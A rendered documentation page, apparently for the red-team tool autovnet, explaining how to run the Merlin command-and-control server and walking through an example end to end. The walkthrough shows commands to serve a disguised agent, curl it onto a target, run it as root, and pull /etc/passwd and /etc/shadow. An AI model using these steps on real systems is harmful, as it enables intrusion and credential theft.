      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/msfdb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    msfdb
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/gitea/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    gitea
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/focalboard/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    focalboard
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/drawio/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    drawio
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/cyberchef/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    cyberchef
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/matrix/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    matrix
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/nextcloud/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    nextcloud
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/owncast/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    owncast
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_6" >
        
          
          <label class="md-nav__link" for="__nav_5_6" id="__nav_5_6_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Util
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_6">
            <span class="md-nav__icon md-icon"></span>
            Util
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../util/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    util
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../util/tmp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    tmp
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_6" >
        
          
          <label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Reference
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_6">
            <span class="md-nav__icon md-icon"></span>
            Reference
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../help/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_7" >
        
          
          <label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Resources
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_7">
            <span class="md-nav__icon md-icon"></span>
            Resources
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/faq/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FAQ
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/troubleshooting/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Troubleshooting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/changelog/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Changelog
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/wild/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    In The Wild
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/refs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    References
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  

  
  


<h1 id="merlin">merlin<a class="headerlink" href="#merlin" title="Permanent link">&para;</a></h1>
<div class="toc">
<ul>
<li><a href="#merlin">merlin</a><ul>
<li><a href="#merlin_1">merlin</a></li>
<li><a href="#concepts">Concepts</a></li>
<li><a href="#merlin-autovnet">merlin + autovnet</a><ul>
<li><a href="#workflow">Workflow</a></li>
</ul>
</li>
<li><a href="#container-mounts-merlin-data">⚠ Container Mounts / Merlin Data ⚠</a><ul>
<li><a href="#mount-location">Mount Location</a></li>
<li><a href="#examples">Examples</a></li>
</ul>
</li>
<li><a href="#server">server</a><ul>
<li><a href="#advanced-topics">Advanced Topics</a></li>
</ul>
</li>
<li><a href="#merlin-listener">merlin listener</a></li>
<li><a href="#http2">http2</a><ul>
<li><a href="#start-the-server">Start the Server</a></li>
<li><a href="#configure-listener">Configure Listener</a></li>
<li><a href="#stage-agent">Stage Agent</a></li>
<li><a href="#deploy-agent">Deploy Agent</a></li>
<li><a href="#receive-callback">Receive Callback</a></li>
<li><a href="#use-the-agent">Use the Agent</a></li>
<li><a href="#recap">Recap</a></li>
</ul>
</li>
<li><a href="#http">http</a><ul>
<li><a href="#start-listener">Start Listener</a></li>
<li><a href="#start-new-agent">Start New Agent</a></li>
</ul>
</li>
<li><a href="#h2c">h2c</a><ul>
<li><a href="#start-listener_1">Start Listener</a></li>
<li><a href="#start-new-agent_1">Start New Agent</a></li>
</ul>
</li>
<li><a href="#https">https</a><ul>
<li><a href="#start-new-agent_2">Start New Agent</a></li>
</ul>
</li>
<li><a href="#http3-quic">http3 (QUIC)</a><ul>
<li><a href="#start-listener_2">Start Listener</a></li>
<li><a href="#start-tun">Start Tun</a></li>
<li><a href="#start-new-agent_3">Start New Agent</a></li>
</ul>
</li>
<li><a href="#scripting">scripting</a><ul>
<li><a href="#example">Example</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<h2 id="merlin_1">merlin<a class="headerlink" href="#merlin_1" title="Permanent link">&para;</a></h2>
<p><a href="https://github.com/Ne0nd0g/merlin">merlin</a> is a cross-platform post-exploitation HTTP/2 Command &amp; Control server and agent written in golang.</p>
<ul>
<li><a href="https://merlin-c2.readthedocs.io/en/latest/">merlin documentation</a></li>
</ul>
<h2 id="concepts">Concepts<a class="headerlink" href="#concepts" title="Permanent link">&para;</a></h2>
<ul>
<li><code>merlin server</code> runs on your local (e.g. Kali) system, and listens for connections<ul>
<li>The <code>server</code> can have multiple listeners, that are bound to different ports and use different protocols</li>
<li>You (the Red Teamer) type commands into the <code>server</code> after it starts</li>
</ul>
</li>
<li><code>merlin agent</code> runs on the target system, and will beacon (periodically connect) to the <code>merlin server</code></li>
<li>The <code>agent</code> sleeps between connections to the <code>server</code><ul>
<li>Commands that you queue for an <code>agent</code> will be executed the next time the <code>agent</code> connects to the server</li>
<li>This means there will be a noticable delay between when you type a commmand and when you get results - this is expected</li>
</ul>
</li>
</ul>
<h2 id="merlin-autovnet">merlin + autovnet<a class="headerlink" href="#merlin-autovnet" title="Permanent link">&para;</a></h2>
<p><code>autovnet</code>'s <a href="../../rdn/">powerful networking features</a> works with the <code>merlin</code> server transparently.</p>
<p>On the wire, the <code>agent</code> will connect to an <code>autovnet</code> <code>listen</code>er (or <code>tun</code>).
<code>autovnet</code> will then deliver those packets over a convoy of carrier pigeons to the <code>merlin server</code> ... or something.</p>
<p>(The connection will eventually get to the <code>merlin server</code>, and everything will Just Work).</p>
<h3 id="workflow">Workflow<a class="headerlink" href="#workflow" title="Permanent link">&para;</a></h3>
<p>The basic workflow is</p>
<ul>
<li>
<p><code>autovnet rtfm merlin server</code></p>
<ul>
<li>Creates a merlin server, generates a codename</li>
<li>You get the <code>merlin</code> (server) prompt, which lets you send commands to <code>agents</code> that connect</li>
</ul>
</li>
<li>
<p><code>autovnet rtfm merlin listener CODENAME</code></p>
<ul>
<li>Configures (and starts) listeners for the previously started <code>merlin server</code></li>
<li>Also sets up the necessary <code>autovnet</code> <code>listen</code>ers and registers <a href="https://autovtools.gitlab.io/autovrtfm/autovnet-docs/usage/rdn/dns/">dns</a> names, exposing your <code>merlin</code> server via multiple, unique IoCs</li>
</ul>
</li>
<li>
<p>Deploy an agent from (<code>/opt/rtfm/merlin/CODENAME/bin</code>)</p>
</li>
</ul>
<h2 id="container-mounts-merlin-data">⚠ Container Mounts / Merlin Data ⚠<a class="headerlink" href="#container-mounts-merlin-data" title="Permanent link">&para;</a></h2>
<p><code>autovnet</code> will execute the <code>merlin server</code> within a <code>docker</code> container, using <code>docker-compose</code>.</p>
<p>This is a good idea for a variety of reasons, but causes a potentional surprise you need to be aware of:</p>
<ul>
<li>The file system within the <code>merlin server</code> container is <strong>not</strong> the same as your Kali's file system<ul>
<li>It is a <strong>temporary</strong> sandbox that will be deleted permanently when you stop the <code>merlin server</code>.</li>
</ul>
</li>
</ul>
<p>So how would you upload or download files?</p>
<ul>
<li>
<p>For a file upload to happen, the <code>merlin server</code> must read the file and send it to the agent</p>
<ul>
<li>But the file you want to upload is on your Kali system, not inside the <code>server</code> sandbox</li>
</ul>
</li>
<li>
<p>Similarly, if you download a file from the <code>agent</code>, the <code>merlin server</code> will write that file within the sandbox</p>
<ul>
<li>But we want to access our "loot" from our Kali system.</li>
</ul>
</li>
</ul>
<p>To make this possible, <code>autovnet</code> uses <a href="https://docs.docker.com/compose/compose-file/#volumes">bind mounts / volumes</a>.</p>
<p>A directory from your Kali system is mounted within the <code>merlin server</code> container.</p>
<p>Both the container and your host system share the directory, so you can use it to transfer files back and forth.</p>
<p>These directories are persistent and saved on your Kali system under <code>/opt/rtfm/merlin</code> by default.</p>
<h3 id="mount-location">Mount Location<a class="headerlink" href="#mount-location" title="Permanent link">&para;</a></h3>
<p>When you start the <code>server</code>, you'll see output like:
<div class="highlight"><pre><span></span><code>...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>mnt:<span class="w"> </span>/opt/rtfm/mnt<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>/opt/rtfm/mnt<span class="w">             </span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>mnt:<span class="w"> </span>/opt/rtfm/merlin/ablaze_key<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>/opt/merlin
...
</code></pre></div></p>
<p>This indicates that <code>/opt/rtfm/mnt</code> on your Kali system is mounted within the merlin server at <code>/opt/rtfm/mnt</code></p>
<ul>
<li>Because these paths are the same, it's a convenient place to put things</li>
</ul>
<p>Here, <code>ablaze_key</code> is the codename of the <code>server</code>.</p>
<p><code>/opt/rtfm/merlin/ablaze_key</code> on your Kali system is mounted within the merlin server at <code>/opt/merlin</code>, and contains all data specific to this instance of the <code>merlin</code> server.</p>
<ul>
<li><code>/opt/rtfm/merlin/ablaze_key/bin</code> contains the <code>agent</code> binaries, downloaded from the <a href="https://github.com/Ne0nd0g/merlin/releases/">merlin releases</a></li>
</ul>
<h3 id="examples">Examples<a class="headerlink" href="#examples" title="Permanent link">&para;</a></h3>
<h2 id="server">server<a class="headerlink" href="#server" title="Permanent link">&para;</a></h2>
<p>Starting the <code>server</code> is easy.</p>
<p>You can run as many servers as you want, and each server can have as many listeners as you want.
  * <code>autovnet</code> makes port conflicts a thing of the past (at least for all protocols but <code>http3</code>, see below)</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span><span class="nv">server</span>
<span class="o">================================================================================</span>
<span class="w"> </span>_______<span class="w"> </span>_______<span class="w">  </span>______<span class="w">        </span>_____<span class="w"> </span>__<span class="w">   </span>_
<span class="w"> </span><span class="p">|</span><span class="w">  </span><span class="p">|</span><span class="w">  </span><span class="p">|</span><span class="w"> </span><span class="p">|</span>______<span class="w"> </span><span class="p">|</span>_____/<span class="w"> </span><span class="p">|</span><span class="w">        </span><span class="p">|</span><span class="w">   </span><span class="p">|</span><span class="w"> </span><span class="se">\ </span><span class="w"> </span><span class="p">|</span>
<span class="w"> </span><span class="p">|</span><span class="w">  </span><span class="p">|</span><span class="w">  </span><span class="p">|</span><span class="w"> </span><span class="p">|</span>______<span class="w"> </span><span class="p">|</span><span class="w">    </span><span class="se">\_</span><span class="w"> </span><span class="p">|</span>_____<span class="w"> </span>__<span class="p">|</span>__<span class="w"> </span><span class="p">|</span><span class="w">  </span><span class="se">\_</span><span class="p">|</span>

<span class="o">================================================================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>malicious_pace
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>listen:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>malicious_pace
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>script:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>script<span class="w"> </span><span class="nv">malicious_pace</span>
<span class="o">================================================================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>mnt:<span class="w"> </span>/opt/rtfm/mnt<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>/opt/rtfm/mnt
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>mnt:<span class="w"> </span>/opt/rtfm/merlin/malicious_pace<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>/opt/merlin
<span class="o">================================================================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>type:<span class="w"> </span>/opt/rtfm/merlin/malicious_pace/type
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>rc.d:<span class="w"> </span>/opt/rtfm/merlin/malicious_pace/rc.d
<span class="o">================================================================================</span>
...
Merlin»
</code></pre></div>
<p>Like most <code>autovnet</code> commands, it generates a random CODENAME (here, <code>malicous_pace</code>) that you can use to restart this server later.</p>
<p>It also prints some example commands you might want to run (<code>listen</code> and <code>script</code>), and some info you may find useful (file paths to the mounted directories).</p>
<p>Once you have started the <code>server</code>, you'll want to use the <code>autovnet rtfm listener</code> command (described below) to start one or more listeners.</p>
<h3 id="advanced-topics">Advanced Topics<a class="headerlink" href="#advanced-topics" title="Permanent link">&para;</a></h3>
<ul>
<li><code>type</code> is a special file - anything you write to that file will be written to the <code>merlin server</code>, exactly as if you typed it.</li>
<li><code>rc.d</code> is a directory of files that should be typed on startup.</li>
</ul>
<h2 id="merlin-listener">merlin listener<a class="headerlink" href="#merlin-listener" title="Permanent link">&para;</a></h2>
<p>The <code>merlin</code> listener command uses a hacky kind of scripting that essentially types keystrokes into your <code>merlin</code> <code>server</code> shell. (<code>merlin</code> does not seem to support scripting natively)</p>
<p>This technique should hopefully work on most normal Linux desktops / shell setups, but if you are using something weird (non-standard TTY setup), then YMMV.</p>
<p>By default, <code>listener</code>s that you configure using <code>autovnet rtfm merlin listener</code> will be restarted if you restart the <code>merlin</code> server using <code>autovnet rtfm merlin CODENAME</code>.</p>
<ul>
<li>Under the hood, these are just files stored in <code>/opt/rtfm/merlin/CODENAME</code> - you can delete or modify them as desired.</li>
<li>See help menus for options that control this behavior</li>
</ul>
<h2 id="http2">http2<a class="headerlink" href="#http2" title="Permanent link">&para;</a></h2>
<p><code>http2</code> is the default <code>listener</code> type.</p>
<p>Here is an end-to-end example of using <code>merlin</code> (through <code>autovnet</code>) with an <code>http2</code> listener.</p>
<h3 id="start-the-server">Start the Server<a class="headerlink" href="#start-the-server" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>server<span class="w">                                                             </span>
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>draconian_concern<span class="w">                    </span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>listen:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern<span class="w">   </span>
...
Merlin»
</code></pre></div>
<h3 id="configure-listener">Configure Listener<a class="headerlink" href="#configure-listener" title="Permanent link">&para;</a></h3>
<p>The <code>listener</code> command will type into the terminal running the <code>merlin</code> <code>server</code>, setting up a <code>merlin</code> listener.</p>
<p>It will also set up <code>autovnet</code> redirection, register DNS names for your listener, and print example commands for starting the agent.</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>draconian_concern.responsible_contribution
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>h2<span class="w"> </span>-url<span class="w"> </span>https://248.143.94.234
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>h2<span class="w"> </span>-url<span class="w"> </span>https://boorish.line.avn
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>draconian_concern<span class="w"> </span><span class="p">|</span><span class="w"> </span><span class="m">248</span>.143.94.234:443<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">127</span>.0.0.1:50537
boorish.line.avn:248.143.94.234
</code></pre></div>
<h3 id="stage-agent">Stage Agent<a class="headerlink" href="#stage-agent" title="Permanent link">&para;</a></h3>
<p>It's up to you to get your agent binary executing on a target system.
This is just a simple example of how you could stage and serve your payload using <code>autovnet</code>.</p>
<p><div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>tmp<span class="w"> </span>shell
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>/opt/rtfm/tmp/cooing_soup

$<span class="w"> </span>cp<span class="w"> </span>/opt/rtfm/merlin/draconian_concern/bin/merlinAgent-Linux-x64<span class="w"> </span>updated
$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>.
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>somber_yard
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>Sharing:<span class="w"> </span>/opt/rtfm/tmp/cooing_soup
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>http://247.133.57.158
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>https://254.192.198.110
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
rare.deep.avn:247.133.57.158
fumbling.brick.avn:254.192.198.110
</code></pre></div>
Our <code>merlin</code> <code>agent</code> binary is now being served at <code>https://fumbling.brick.avn/updated</code></p>
<h3 id="deploy-agent">Deploy Agent<a class="headerlink" href="#deploy-agent" title="Permanent link">&para;</a></h3>
<p>This example assumes a Linux target (named <code>target</code>) for which we have known credentials.
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>.proxy-ssh<span class="w"> </span>target@target
$<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="nv">$SSH_CLIENT</span>
<span class="m">248</span>.69.21.233<span class="w"> </span><span class="m">32906</span><span class="w"> </span><span class="m">22</span>

$<span class="w"> </span>curl<span class="w"> </span>-k<span class="w"> </span>https://fumbling.brick.avn/updated<span class="w"> </span>-o<span class="w"> </span>/tmp/updated
<span class="w">  </span>%<span class="w"> </span>Total<span class="w">    </span>%<span class="w"> </span>Received<span class="w"> </span>%<span class="w"> </span>Xferd<span class="w">  </span>Average<span class="w"> </span>Speed<span class="w">   </span>Time<span class="w">    </span>Time<span class="w">     </span>Time<span class="w">  </span>Current
<span class="w">                                 </span>Dload<span class="w">  </span>Upload<span class="w">   </span>Total<span class="w">   </span>Spent<span class="w">    </span>Left<span class="w">  </span>Speed
<span class="m">100</span><span class="w"> </span>8732k<span class="w">  </span><span class="m">100</span><span class="w"> </span>8732k<span class="w">    </span><span class="m">0</span><span class="w">     </span><span class="m">0</span><span class="w">   </span>105M<span class="w">      </span><span class="m">0</span><span class="w"> </span>--:--:--<span class="w"> </span>--:--:--<span class="w"> </span>--:--:--<span class="w">  </span>106M
$<span class="w"> </span>chmod<span class="w"> </span>+x<span class="w"> </span>/tmp/updated<span class="w"> </span>
$<span class="w"> </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/updated
-rwxrwxr-x<span class="w"> </span><span class="m">1</span><span class="w"> </span>target<span class="w"> </span>target<span class="w"> </span><span class="m">8</span>.6M<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:05<span class="w"> </span>/tmp/updated
$<span class="w"> </span>sudo<span class="w"> </span>-i
<span class="c1"># /tmp/updated -url https://boorish.line.avn</span>
</code></pre></div></p>
<h3 id="receive-callback">Receive Callback<a class="headerlink" href="#receive-callback" title="Permanent link">&para;</a></h3>
<p>The <code>merlin</code> <code>agent</code> should check in after a minute or so.
Remember, <code>merlin</code> beacons, so there will be a significant delay between commands and their output.
(See <a href="https://merlin-c2.readthedocs.io/en/latest/server/menu/agents.html#sleep">the merlin documentation</a> for changing these tunables)</p>
<p>You will see the checkin message in the terminal running the <code>server</code>.
You will use that terminal to control the <code>agent</code> as well.</p>
<div class="highlight"><pre><span></span><code>Merlin»<span class="w">  </span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>New<span class="w"> </span>authenticated<span class="w"> </span>agent<span class="w"> </span>checkin<span class="w"> </span><span class="k">for</span><span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:07:49Z
</code></pre></div>
<h3 id="use-the-agent">Use the Agent<a class="headerlink" href="#use-the-agent" title="Permanent link">&para;</a></h3>
<p><a href="https://merlin-c2.readthedocs.io/en/latest/index.html">Read the merlin documentation</a>.
This is just an example, and may become outdated as <code>merlin</code> changes.</p>
<p>Here, we download <code>/etc/passwd</code> and <code>/etc/shadow</code>, and run the <code>w</code> command.
<div class="highlight"><pre><span></span><code>Merlin»<span class="w"> </span>agent<span class="w"> </span>list

<span class="w">               </span>AGENT<span class="w"> </span>GUID<span class="w">              </span><span class="p">|</span><span class="w">    </span>TRANSPORT<span class="w">    </span><span class="p">|</span><span class="w">  </span>PLATFORM<span class="w">   </span><span class="p">|</span><span class="w"> </span>HOST<span class="w"> </span><span class="p">|</span><span class="w"> </span>USER<span class="w"> </span><span class="p">|</span><span class="w">    </span>PROCESS<span class="w">    </span><span class="p">|</span><span class="w"> </span>STATUS<span class="w"> </span><span class="p">|</span><span class="w"> </span>LAST<span class="w"> </span>CHECKIN<span class="w"> </span><span class="p">|</span><span class="w"> </span>NOTE<span class="w">  </span>
+--------------------------------------+-----------------+-------------+------+------+---------------+--------+--------------+------+
<span class="w">  </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span><span class="p">|</span><span class="w"> </span>HTTP/2<span class="w"> </span>over<span class="w"> </span>TLS<span class="w"> </span><span class="p">|</span><span class="w"> </span>linux/amd64<span class="w"> </span><span class="p">|</span><span class="w"> </span>dev<span class="w">  </span><span class="p">|</span><span class="w"> </span>root<span class="w"> </span><span class="p">|</span><span class="w"> </span>updated<span class="o">(</span><span class="m">5397</span><span class="o">)</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>Active<span class="w"> </span><span class="p">|</span><span class="w"> </span><span class="m">0</span>:00:16<span class="w"> </span>ago<span class="w">  </span><span class="p">|</span><span class="w">       </span>

Merlin»<span class="w"> </span>interact<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w"> </span>download<span class="w"> </span>/etc/passwd
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w">  </span>
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Created<span class="w"> </span>job<span class="w"> </span>NGJosdaSCN<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:13:51Z
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w"> </span>download<span class="w"> </span>/etc/shadow
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w">  </span>
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Created<span class="w"> </span>job<span class="w"> </span>AWpBpTackH<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:13:56Z
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w"> </span>shell<span class="w"> </span>w
Merlin<span class="o">[</span>agent<span class="o">][</span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="o">]</span>»<span class="w">  </span>
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Created<span class="w"> </span>job<span class="w"> </span>iGUMhrsbBX<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:05Z
<span class="o">[</span>+<span class="o">]</span>Results<span class="w"> </span><span class="k">for</span><span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:53Z
<span class="o">[</span>+<span class="o">]</span>Successfully<span class="w"> </span>downloaded<span class="w"> </span>file<span class="w"> </span>/etc/passwd<span class="w"> </span>with<span class="w"> </span>a<span class="w"> </span>size<span class="w"> </span>of<span class="w"> </span><span class="m">2896</span><span class="w"> </span>bytes<span class="w"> </span>from<span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>to<span class="w"> </span>/opt/merlin/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f/passwd
<span class="o">[</span>+<span class="o">]</span>Results<span class="w"> </span><span class="k">for</span><span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:53Z

<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Results<span class="w"> </span>job<span class="w"> </span>NGJosdaSCN<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:53Z
<span class="o">[</span>+<span class="o">]</span>Successfully<span class="w"> </span>downloaded<span class="w"> </span>file<span class="w"> </span>/etc/shadow<span class="w"> </span>with<span class="w"> </span>a<span class="w"> </span>size<span class="w"> </span>of<span class="w"> </span><span class="m">1553</span><span class="w"> </span>bytes<span class="w"> </span>from<span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>to<span class="w"> </span>/opt/merlin/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f/shadow

<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Results<span class="w"> </span>job<span class="w"> </span>AWpBpTackH<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:53Z

